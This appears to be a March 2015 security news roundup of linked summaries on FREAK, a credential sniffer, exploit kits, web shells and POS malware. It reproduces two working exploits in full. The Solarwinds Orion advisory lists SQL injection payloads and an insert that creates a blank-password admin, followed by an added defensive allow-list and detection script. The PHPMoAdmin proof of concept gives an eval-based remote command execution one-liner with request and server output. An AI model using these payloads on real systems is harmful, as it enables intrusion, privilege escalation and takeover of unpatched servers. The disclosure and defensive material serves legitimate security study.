Channel: BOT24

Attack of the week: FREAK (or 'factoring the NSA for fun and profit')

This is the story of how a handful of cryptographers 'hacked' the NSA. It's also a story of encryption backdoors, and why they never quite work out the way you want them to.

more here.......http://blog.cryptographyengineering.com/2015/03/attack-of-week-freak-or-factoring-nsa.html

and more here......https://www.freakattack.com/

net-creds: Sniffs sensitive data from interface or pcap

Thoroughly sniff passwords and hashes from an interface or pcap file. Concatenates fragmented packets and does not rely on ports for service identification. Screenshots: http://imgur.com/opQo7Bb http://imgur.com/Kl5I6Ju

Sniffs:
- URLs visited
- POST loads sent
- HTTP form logins/passwords
- HTTP basic auth logins/passwords
- HTTP searches
- FTP logins/passwords
- IRC logins/passwords
- POP logins/passwords
- IMAP logins/passwords
- Telnet logins/passwords
- SMTP logins/passwords
- SNMP community string
- NTLMv1/v2 on all supported protocols such as HTTP, SMB, LDAP, etc.
- Kerberos


more here........https://github.com/DanMcInerney/net-creds

binvis.io - a browser-based tool for visualising binary data

Over the years, I've written a number of posts on this blog on the topic of binary data visualisation. I looked at using space-filling curves to understand the structure of binary data, I've shown how entropy visualisation lets you trivially pick out compressed and encrypted sections, and I've drawn pretty pictures of malware. Unfortunately the tools I wrote all produced static images, which made making practical use a pain. You really need interactivity to be able to combine visual exploration with inspection of the actual underlying data, and to let you easily export interesting sections.

more here............http://corte.si/posts/binvis/announce/index.html

Airodump-NG Scan Visualizer ver 0.1

We all love Airodump-NG! I am personally a fan of the entire Aircrack-NG tool suite and the fantastic work done by Mister_X over the years. As most of you know, Airodump-NG can export the scan data as a CSV or a Kismet-compatible Netxml file. The Airodump-NG Scan Visualizer takes this CSV file and allows you to filter and play around with this scan data in interesting ways.

Getting Started with the Airodump-NG Scan Visualizer

more here.........http://hackoftheday.securitytube.net/2015/03/airodump-ng-scan-visualizer-ver-01.html

Hospital Sues Bank of America Over Million-Dollar Cyberheist

A public hospital in Washington state is suing Bank of America to recoup some of the losses from a $1.03 million cyberheist that the healthcare organization suffered in 2013.

more here........http://krebsonsecurity.com/2015/03/hospital-sues-bank-of-america-over-million-dollar-cyberheist/

GAO 46-Page Document: FAA Needs to Address Weaknesses in Air Traffic Control Systems

While the Federal Aviation Administration (FAA) has taken steps to protect its air traffic control systems from cyber-based and other threats, significant security control weaknesses remain, threatening the agency’s ability to ensure the safe and uninterrupted operation of the national airspace system (NAS). These include weaknesses in controls intended to prevent, limit, and detect unauthorized access to computer resources, such as controls for protecting system boundaries, identifying and authenticating users, authorizing users to access systems, encrypting sensitive data, and auditing and monitoring activity on FAA’s systems. Additionally, shortcomings in boundary protection controls between less-secure systems and the operational NAS environment increase the risk from these weaknesses.

more here.....http://www.gao.gov/assets/670/668169.pdf

Monitoring tools: user notification required

The Microsoft Malware Protection Center (MMPC) helps to keep Windows customers in control of their computing experience, information, and privacy. We use objective criteria to help protect customers against malware and unwanted software. This means helping to protect you against monitoring software that maliciously collects and provides unauthorized access to your private data.

We are aware of social engineering campaigns that target users in Eastern Europe and Brazil using monitoring software. The technique that we have observed involves both:

- Concealing monitoring tools inside applications or games available for download from file-sharing websites.
- Collecting private data using email accounts or FTP servers, once the bundled application has been opened.

more here..........http://blogs.technet.com/b/mmpc/archive/2015/03/03/monitoring-tools-user-notification-required.aspx

Threat Spotlight from Cisco on Previously Discussed Exploit Kit: Angler Lurking in the Domain Shadows

Over the last several months Talos researchers have been monitoring a massive exploit kit campaign that is utilizing hijacked registrant accounts to create large numbers of subdomains for both initial redirection and exploitation. This campaign has been largely attributed to Angler Exploit Kit with fileless exploits serving various malicious payloads.

The use of hijacked accounts led to a larger research project into the use of hijacked registrant accounts. During this research the earliest examples were found from a 2011 campaign, with sporadic usage until December 2014. Since December 2014 more than 75% of the subdomain activity has occurred, indicating a major shift in approach. This behavior has been covered before; that coverage discussed some of the older campaigns as well as the hosting indicators (ASN) of the groups making use of the subdomains.

more here..........http://blogs.cisco.com/security/talos/angler-domain-shadowing

Multiple SQL injections in core Orion service affecting many Solarwinds products (CVE-2014-9566)

I found a couple of SQL injection vulnerabilities in the core Orion service
used in most of the Solarwinds products (SAM, IPAM, NPM, NCM, etc…). This
service provides a consistent configuration and authentication layer across
the products.

To be exact, the vulnerable applications and versions are:

Network Performance Monitor -- < 11.5
NetFlow Traffic Analyzer -- < 4.1
Network Configuration Manager -- < 7.3.2
IP Address Manager -- < 4.3
User Device Tracker -- < 3.2
VoIP & Network Quality Manager -- < 4.2
Server & Application Monitor -- < 6.2
Web Performance Monitor -- < 2.2

At first glance, the injections are only available to admins, as the
requests used are on the Manage Accounts page. However, it seems there is
no real ACL check on the GetAccounts and GetAccountGroups endpoints of the
AccountManagement.asmx service, which means that even authenticating as
Guest allows for exploitation. By default, the Guest account has no
password and is enabled.

On both the GetAccounts and GetAccountGroups endpoints, the 'sort' and
'dir' parameters are susceptible to boolean-/time-based, and stacked
injections. By capturing the AJAX requests made by an admin user to these
endpoints, authenticating as Guest and replacing the admin cookie with the
Guest cookie, you can still make a successful request, and thus a
successful exploitation vector for any authenticated user.

Being a stacked injection, this becomes a privilege escalation at the very
least, as an attacker is able to insert their own admin user. A pull
request for a Metasploit module which should achieve this on any product
using the Orion service as the core authentication management system, using
the GetAccounts endpoint, has been made (
https://github.com/rapid7/metasploit-framework/pull/4836). By default, the
module attempts to authenticate as the Guest user with a blank password,
then exploit the SQL injection to insert a new admin with a blank password.

I am not sure if the non-trial versions allow you to specify your own SQL
server, but the trials install a SQL Server Express instance. The SQL user
that the application uses is not an administrator, and the xp_cmd_shell
stored procedure is unavailable.

Within the GetAccounts endpoint:

Parameter: dir (GET)

    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause
    Payload: sort=Accounts.AccountID&dir=ASC,(SELECT (CASE WHEN (5791=5791) THEN CHAR(65)+CHAR(83)+CHAR(67) ELSE 5791*(SELECT 5791 FROM master..sysdatabases) END))

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: sort=Accounts.AccountID&dir=ASC; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: sort=Accounts.AccountID&dir=ASC WAITFOR DELAY '0:0:5'--


Parameter: sort (GET)

    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)
    Payload: sort=(SELECT (CASE WHEN (8998=8998) THEN CHAR(65)+CHAR(99)+CHAR(99)+CHAR(111)+CHAR(117)+CHAR(110)+CHAR(116)+CHAR(115)+CHAR(46)+CHAR(65)+CHAR(99)+CHAR(99)+CHAR(111)+CHAR(117)+CHAR(110)+CHAR(116)+CHAR(73)+CHAR(68) ELSE 8998*(SELECT 8998 FROM master..sysdatabases) END))&dir=ASC

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: sort=Accounts.AccountID; WAITFOR DELAY '0:0:5'--&dir=ASC

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: sort=Accounts.AccountID WAITFOR DELAY '0:0:5'--&dir=ASC



Within the GetAccountGroups endpoint, very similar injection techniques are
available:

Parameter: dir (GET)

    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause
    Payload: sort=Accounts.GroupPriority&dir=ASC,(SELECT (CASE WHEN (8799=8799) THEN CHAR(65)+CHAR(83)+CHAR(67) ELSE 8799*(SELECT 8799 FROM master..sysdatabases) END))

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: sort=Accounts.GroupPriority&dir=ASC; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: sort=Accounts.GroupPriority&dir=ASC WAITFOR DELAY '0:0:5'--


Parameter: sort (GET)

    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)
    Payload: sort=(SELECT (CASE WHEN (1817=1817) THEN CHAR(65)+CHAR(99)+CHAR(99)+CHAR(111)+CHAR(117)+CHAR(110)+CHAR(116)+CHAR(115)+CHAR(46)+CHAR(71)+CHAR(114)+CHAR(111)+CHAR(117)+CHAR(112)+CHAR(80)+CHAR(114)+CHAR(105)+CHAR(111)+CHAR(114)+CHAR(105)+CHAR(116)+CHAR(121) ELSE 1817*(SELECT 1817 FROM master..sysdatabases) END))&dir=ASC

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: sort=Accounts.GroupPriority; WAITFOR DELAY '0:0:5'--&dir=ASC

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: sort=Accounts.GroupPriority WAITFOR DELAY '0:0:5'--&dir=ASC


An example injection to insert an admin user named notadmin with a blank
password using the 'dir' parameter would be:

ASC;insert into accounts values ('notadmin', '127-510823478-74417-8',
'/+PA4Zck3arkLA7iwWIugnAEoq4ocRsYjF7lzgQWvJc+pepPz2a5z/L1Pz3c366Y/CasJIa7enKFDPJCWNiKRg==',
'Feb  1 2100 12:00AM', 'Y', 'notadmin', 1, '', '', 1, -1, 8, -1, 4, 0, 0,
0, 0, 0, 0, 'Y', 'Y', 'Y', 'Y', 'Y', '', '', 0, 0, 0, 'N', 'Y', '', 1, '',
0, '');

This vulnerability was reported to Solarwinds on Dec 8th, 2014 and was
assigned the CVE identifier CVE-2014-9566. A coordinated disclosure date of
Feb 24th, 2015 was chosen by both parties. I would like to thank Rob Hock,
Group Product Manager – Network Management at Solarwinds for the easy
coordination (you should still have a bug bounty though!).


Authored by Brandon Perry
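
As an added example (not Solarwinds' code and not the advisory author's), the fix a defender wants for the 'sort'/'dir' pattern described above: both parameters are mapped onto a fixed allow-list before anything reaches the query (ORDER BY cannot take bound parameters, so escaping is not the answer), together with a log-side check that flags the request shapes quoted in the advisory. The endpoint paths, the column allow-list and the sample URLs are constructed for this example; the signatures are derived from the payloads shown above.

```python
"""Added example (not Solarwinds code): allow-listed ORDER BY construction for
'sort'/'dir' style parameters, plus a log-side check for the injection shapes
quoted in the advisory. Endpoint paths and column names are constructed."""
import re
from typing import Dict, List
from urllib.parse import unquote_plus, urlsplit

# Constructed allow-list: the only identifiers a sortable endpoint may emit.
# ORDER BY cannot take bound parameters, so mapping onto fixed identifiers is
# the correct fix, not escaping.
SORT_COLUMNS = {"Accounts.AccountID", "Accounts.GroupPriority", "Accounts.Enabled"}
DIRECTIONS = {"ASC", "DESC"}


def build_order_by(sort: str, direction: str) -> str:
    """Return a safe ORDER BY clause, or raise ValueError for anything not allow-listed."""
    if sort not in SORT_COLUMNS:
        raise ValueError("unknown sort column: %r" % sort)
    direction = direction.strip().upper()
    if direction not in DIRECTIONS:
        raise ValueError("unknown sort direction: %r" % direction)
    return "ORDER BY %s %s" % (sort, direction)


def accepts(sort: str, direction: str) -> bool:
    """True when the pair would be allowed to reach the database."""
    try:
        build_order_by(sort, direction)
        return True
    except ValueError:
        return False


# Signatures of the three shapes in the advisory: time-based (WAITFOR DELAY),
# stacked (';' followed by a new statement) and a boolean CASE inside ORDER BY.
INJECTION_PATTERNS = [
    re.compile(r"\bwaitfor\s+delay\b", re.I),
    re.compile(r";\s*(insert|update|delete|exec|waitfor)\b", re.I),
    re.compile(r"\(\s*select\b.*\bcase\s+when\b", re.I | re.S),
    re.compile(r"\bmaster\.\.sysdatabases\b", re.I),
]


def query_params(url: str) -> Dict[str, List[str]]:
    """Split a request URL's query on '&' only, so a ';' stays inside the value."""
    params: Dict[str, List[str]] = {}
    for pair in urlsplit(url).query.split("&"):
        name, _, value = pair.partition("=")
        params.setdefault(unquote_plus(name), []).append(unquote_plus(value))
    return params


def flag_request(url: str) -> List[str]:
    """Names of 'sort'/'dir' parameters whose value matches an injection signature."""
    values = query_params(url)
    hits = []
    for name in ("sort", "dir"):
        if any(p.search(v) for v in values.get(name, []) for p in INJECTION_PATTERNS):
            hits.append(name)
    return hits


# Constructed log entries in the shape of the advisory's GET requests.
SAMPLE_URLS = [
    "/AccountManagement.asmx/GetAccounts?sort=Accounts.AccountID&dir=ASC",
    "/AccountManagement.asmx/GetAccounts?sort=Accounts.AccountID&dir=ASC; WAITFOR DELAY '0:0:5'--",
    "/AccountManagement.asmx/GetAccountGroups?sort=Accounts.GroupPriority; WAITFOR DELAY '0:0:5'--&dir=ASC",
]
```

Running `flag_request` over the sample URLs flags the second on `dir` and the third on `sort`, while `accepts` rejects every payload from the advisory because neither the column nor the direction survives the allow-list.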

PHPMoAdmin Unauthorized Remote Code Execution (0-Day) PoC

######################################################################
#  _     ___  _   _  ____  ____    _  _____
#  | |   / _ \| \ | |/ ___|/ ___|  / \|_   _|
#  | |  | | | |  \| | |  _| |     / _ \ | |
#  | |__| |_| | |\  | |_| | |___ / ___ \| |
#  |_____\___/|_| \_|\____|\____/_/   \_\_|
#
# PHPMoAdmin Unauthorized Remote Code Execution (0-Day)
# Website : http://www.phpmoadmin.com/
# Exploit Author : @u0x (Pichaya Morimoto), Xelenonz, pe3z, Pistachio
# Release dates : March 3, 2015
#
# Special Thanks to 2600 Thailand group
# https://www.facebook.com/groups/2600Thailand/ , http://2600.in.th/
#
########################################################################

[+] Description
============================================================
PHPMoAdmin is a MongoDB administration tool for PHP built on a
stripped-down version of the Vork high-performance framework.

[+] Exploit
============================================================
Someone was trying to sell this shit for 3000 USD lolz

$ curl "http://path.to/moadmin.php" -d "object=1;system('id');exit"

[+] Proof-of-Concept
============================================================
PoC Environment: Ubuntu 14.04, PHP 5.5.9, Apache 2.4.7

POST /moadmin/moadmin.php HTTP/1.1
Host: 192.168.33.10
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 34

object=1;system('id;ls -lha');exit

HTTP/1.1 200 OK
Date: Tue, 03 Mar 2015 16:57:40 GMT
Server: Apache/2.4.7 (Ubuntu)
Set-Cookie: PHPSESSID=m0ap55aonsj5ueph7hgku0elb1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 223
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

uid=33(www-data) gid=33(www-data) groups=33(www-data)
total 116K
drwxr-xr-x 1 longcat longcat  102 Mar  3 16:55 .
drwxr-xr-x 6 root    root    4.0K Mar  3 16:17 ..
-rw-rw-r-- 1 longcat longcat 112K Mar  3 16:55 moadmin.php

[+] Vulnerability Analysis
============================================================
Filename: moadmin.php
1. create new moadminComponent object
1977: $mo = new moadminComponent;

2. if the http-post parameter 'object' is set
738: class moadminComponent {
...
762: public function __construct() {
...
786: if (isset($_POST['object'])) {
787:    if (self::$model->saveObject($_GET['collection'], $_POST['object'])) {
...

3. evaluate the value of 'object' as PHP code
692: public function saveObject($collection, $obj) {
693:    eval('$obj=' . $obj . ';'); //cast from string to array

An Example of Evolving Obfuscation

Since May of 2014, I've been tracking a particular group that uses the Sweet Orange exploit kit to deliver malware.  This group also uses obfuscation to make it harder to detect the infection chain of events.

more here.........https://isc.sans.edu/forums/diary/An+Example+of+Evolving+Obfuscation/19403

PCAP of the traffic: 2015-03-03-traffic-analysis-exercise.pcap

SCENARIO

Time for another shift at your organization's Security Operations Center (SOC).  You review some EmergingThreats alerts for Angler exploit kit on a host within your network.

You review the pcap and document the following here...........http://malware-traffic-analysis.net/2015/03/03/index.html

C99Shell not dead

I recently got contacted on Twitter regarding a hacked webpage.

After I received the files two things became apparent:

- the webserver (and thus the website) was infected with C99shell
- the webserver was infected with other PHP backdoors

more here.........http://bartblaze.blogspot.com/2015/03/c99shell-not-dead.html

Android Application hacking with Insecure Bank Part 2

In the previous article, we looked at setting up a mobile pentesting platform for Android applications. By now, you must have set up an emulator using Genymotion and installed all the Android command line tools along with some other additional tools (drozer, dex2jar, apktool). In this article, we will look at some information gathering techniques. We will see how we can decompile an application to its Java source, analyze the signature of the application and many more things.

more here........http://resources.infosecinstitute.com/android-application-hacking-insecure-bank-part-2/

SuperFish SSL Sniffing

Since everyone has blogged about SuperFish and other Komodia products we can skip all that and get to the good stuff. It’s extremely easy to sniff SSL traffic and get headers, cookies, whatever you want from an HTTPS request if you are able to control the traffic.

more here..........http://pashakravtsov.com/2015/03/03/SuperFish-SSL-Sniffing/

What is noninterference, and how do we enforce it?

In this post I discuss a program security property called noninterference. I motivate why you might like it if your program satisfied noninterference, and show that the property is fundamental to many areas beyond just security. I also explore some programming languages and tools that might help you enforce noninterference, noting that while tainting analysis won’t get you the whole way there, research tools that attempt to do better have their own problems. I conclude with some suggestions for future research, in particular with the idea that testing noninterference may be a practical approach.

more here..........http://www.pl-enthusiast.net/2015/03/03/noninterference/

Deobfuscating a Wicked-Looking Script

Bart Blaze, one of my security researcher friends, passed along this PHP script to me. Let’s have a look here..........http://www.kahusecurity.com/2015/deobfuscating-a-wicked-looking-script/

toolsmith: Faraday IPE - When Tinfoil Won’t Work for Pentesting

I love me some tinfoil-hat-wearing conspiracy theorists, nothing better than sparking up a lively conversation with a “Hey man, what was that helicopter doing over your house?” and you’re off to the races. Me, I just operate on the premise that everyone is out to get me and I’m good to go. For the more scientific amongst you, there’s always a Faraday option. What? You don’t have a Faraday Cage in your house? You’re going to need more tinfoil. :-)

more here.......http://holisticinfosec.blogspot.com/2015/03/toolsmith-faraday-ipe-when-tinfoil-wont.html

PwnPOS: Old Undetected PoS Malware Still Causing Havoc

We have been observing a new malware that infects point-of-sale (POS) systems. This malware may have been active since 2013, possibly earlier. Trend Micro will be naming this new malware family PwnPOS to differentiate it from other known PoS malware families.

In this blog post, we will discuss the technical details of this PoS malware. Researchers and incident response teams can add our findings to their growing number of PoS malware indicators.

more here........http://blog.trendmicro.com/trendlabs-security-intelligence/pwnpos-old-undetected-pos-malware-still-causing-havoc/

ElasticSearch Groovy script remote code execution vulnerability analysis (CVE-2015-1427)

ElasticSearch is a search and analytics engine developed in Java. In 2014 a remote code execution vulnerability (CVE-2014-3120) was found in its scripted query module: because the engine allowed script code (MVEL) to be used as expressions for data manipulation, an attacker could construct MVEL code that executed arbitrary Java. The scripting engine was then replaced with Groovy and a sandbox was added so that dangerous code would be blocked, but because the sandbox restrictions were not strict enough, this again leads to remote code execution. No public PoC has been seen online so far; after some research the exploitation pattern was found. Let's look at how the vulnerability arises.


more here, so make use of whatever translation software you find somewhat effective, as this is in Chinese .......http://drops.wooyun.org/papers/5107